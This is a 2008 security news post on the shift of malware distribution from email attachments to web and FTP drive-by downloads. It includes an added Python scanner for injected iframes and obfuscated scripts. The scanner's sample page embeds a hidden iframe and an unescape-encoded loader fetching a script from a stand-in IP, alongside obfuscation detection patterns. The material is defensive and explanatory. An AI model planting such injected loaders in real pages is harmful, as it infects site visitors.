From Simple Mail to Hypertext

Posted by Virus Bulletin on Mar 31, 2008

HTTP and FTP take over from SMTP as common malware spreading methods.

A report from F-Secure has highlighted the recent shift in malware spreading methods from email to web-based methods.

For many years, malware authors' preferred method of spreading their wares was to send out masses of emails that carried the malware as an attachment. A suggestion in the body of the email that the attached file would somehow be of interest to the recipient then led millions of naive users to run it, which is how mass-mailing worms such as Bagle and Mydoom installed themselves on so many systems.

But better awareness among users, many of whom now know not to open email attachments unless they are sure of the contents, combined with the fact that many organisations now block all email containing .exe attachments, has forced malware writers to find new ways to spread their 'products'. The new preferred method seems to be the web.

There are several ways of getting malware onto users' computers through the web, F-Secure reports. One is to lure users into visiting a malicious link sent in a spam message; another is to set up dummy websites stuffed with popular keywords so that they rank in search engine results, and then wait for users to click through to them.

An even more stealthy way of infecting users, the drive-by download, is to compromise popular legitimate websites and insert a small iframe or piece of JavaScript that exploits vulnerabilities in the browser or operating system to install malware without any user interaction. Recently we reported on a mass iframe injection that affected many popular websites, including that of at least one anti-virus vendor. Common sense offers no protection here, because the site being visited is a trusted one; the defences that do help are keeping anti-virus software up to date and keeping the browser and operating system fully patched.
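The injection pattern described above (a tiny or hidden iframe, or an obfuscated inline script, dropped into an otherwise legitimate page) can be checked for mechanically when auditing a site's own HTML. The scanner below is an added example written for this page, not code from the original post or from F-Secure; its heuristics, the host name www.example.com and the 203.0.113.5 address in the constructed sample page are assumptions chosen for illustration.

```python
"""Flag injected iframes and obfuscated inline scripts in an HTML page.

Added example, not part of the original post.  The heuristics are
illustrative: a real scanner would add allow-lists for legitimate
third-party embeds and a broader set of obfuscation idioms.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Obfuscation idioms typical of injected droppers (assumption: illustrative list).
OBFUSCATION_RE = re.compile(
    r"document\.write\s*\(\s*unescape"
    r"|eval\s*\(\s*unescape"
    r"|String\.fromCharCode"
    r"|(?:%[0-9a-fA-F]{2}){20,}"  # long runs of percent-encoding
)


def _is_hidden(attrs):
    """True if an iframe is effectively invisible: 0/1 px or hidden by CSS."""
    width = re.sub(r"px$", "", attrs.get("width", "").strip())
    height = re.sub(r"px$", "", attrs.get("height", "").strip())
    style = attrs.get("style", "").replace(" ", "").lower()
    tiny = width in ("0", "1") or height in ("0", "1")
    hidden_css = (
        "display:none" in style
        or "visibility:hidden" in style
        or re.search(r"(?:left|top):-\d{3,}", style) is not None  # off-screen
    )
    return tiny or hidden_css


class InjectionScanner(HTMLParser):
    """Collects (finding_type, evidence) tuples while parsing."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.findings = []
        self._in_script = False
        self._script_buf = []

    def handle_starttag(self, tag, attrs):
        # Attributes without a value (e.g. <iframe hidden>) arrive as None.
        attrs = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            src = attrs.get("src", "")
            # A relative src stays on the page's own host.
            host = urlparse(src).hostname or self.page_host
            if _is_hidden(attrs) or host != self.page_host:
                self.findings.append(("hidden-or-foreign-iframe", src))
        elif tag == "script":
            self._in_script = True
            self._script_buf = []

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies through handle_data.
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._script_buf)
            match = OBFUSCATION_RE.search(body)
            if match:
                self.findings.append(("obfuscated-inline-script", match.group(0)[:40]))


def scan_page(html, page_host):
    """Return the list of findings for one page served from page_host."""
    scanner = InjectionScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a legitimate page with one benign embed plus an
# injected hidden iframe and an injected document.write(unescape(...)) loader.
SAMPLE_PAGE = """<html><head><title>News</title>
<script src="/js/site.js"></script></head>
<body><h1>Welcome</h1>
<iframe src="https://www.example.com/widget" width="300" height="200"></iframe>
<iframe src="http://203.0.113.5/in.php" width=0 height=0 style="display:none"></iframe>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A%2F%2F203.0.113.5%2Fx.js%22%3E%3C%2Fscript%3E'));</script>
</body></html>"""

if __name__ == "__main__":
    for kind, evidence in scan_page(SAMPLE_PAGE, "www.example.com"):
        print(f"{kind}: {evidence}")
```

Run against the sample page, the scanner reports the hidden iframe pointing at the foreign IP and the `document.write(unescape` loader, while the sized, same-host widget iframe and the site's own external script pass. Two independent signals (visibility and host) are used for iframes because injected frames are usually hidden, but a visible frame to an unexpected host is still worth a look.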

"It is important to be aware of this shift from SMTP to HTTP infections, which can be exploited by the criminals in many ways," F-Secure writes. "Companies often measure their risk of getting infected by looking at the amount of stopped attachments at their email gateway. Those numbers are definitely going down, but the actual risk of getting infected probably isn't."

The report concludes by warning that the number of emails containing links to malware hosted on FTP servers is growing, and urges individuals and companies to filter not only HTTP traffic but FTP traffic as well.



